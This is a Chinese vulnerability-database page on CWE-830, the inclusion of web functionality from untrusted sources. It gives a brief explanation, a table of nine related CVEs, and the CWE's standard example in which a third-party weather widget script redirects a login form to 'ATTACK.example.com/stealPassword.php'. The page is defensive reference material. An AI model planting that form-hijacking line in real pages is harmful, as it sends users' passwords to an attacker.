CWE-830 从非可信源包含Web功能例程 类弱点 9 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-830指从不可信源引入Web功能(如小部件)的漏洞。攻击者常利用此缺陷,通过注入恶意脚本或篡改第三方资源,使代码在应用域内执行,从而获取对产品的完全控制权。开发者应避免直接嵌入不可信内容,改用沙箱隔离、内容安全策略(CSP)或严格验证来源,以限制执行权限并防止跨域攻击。
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2025-65109 | Minder 安全漏洞 — minder | 4.3 | - | 2025-11-21 |
| CVE-2025-46652 | IZArc 安全漏洞 — IZArc | 6.1 | Medium | 2025-04-26 |
| CVE-2025-43703 | Anki 安全漏洞 — Anki | 6.1 | Medium | 2025-04-16 |
| CVE-2025-33027 | Bandisoft Bandizip 安全漏洞 — Bandizip | 6.1 | Medium | 2025-04-15 |
| CVE-2025-33026 | PeaZip 安全漏洞 — PeaZip | 6.1 | Medium | 2025-04-15 |
| CVE-2025-33028 | WinZip 安全漏洞 — WinZip | 6.1 | Medium | 2025-04-15 |
| CVE-2024-35180 | OMERO.web 安全漏洞 — omero-web | 6.1 | Medium | 2024-05-21 |
| CVE-2023-2588 | Teltonika Remote Management System 安全漏洞 — Remote Management System | 8.8 | High | 2023-05-22 |
| CVE-2021-28162 | Eclipse Theia 注入漏洞 — Eclipse Theia | 6.1 | - | 2021-03-12 |
CWE-830(从非可信源包含Web功能例程) 是常见的弱点类别,本平台收录该类弱点关联的 9 条 CVE 漏洞。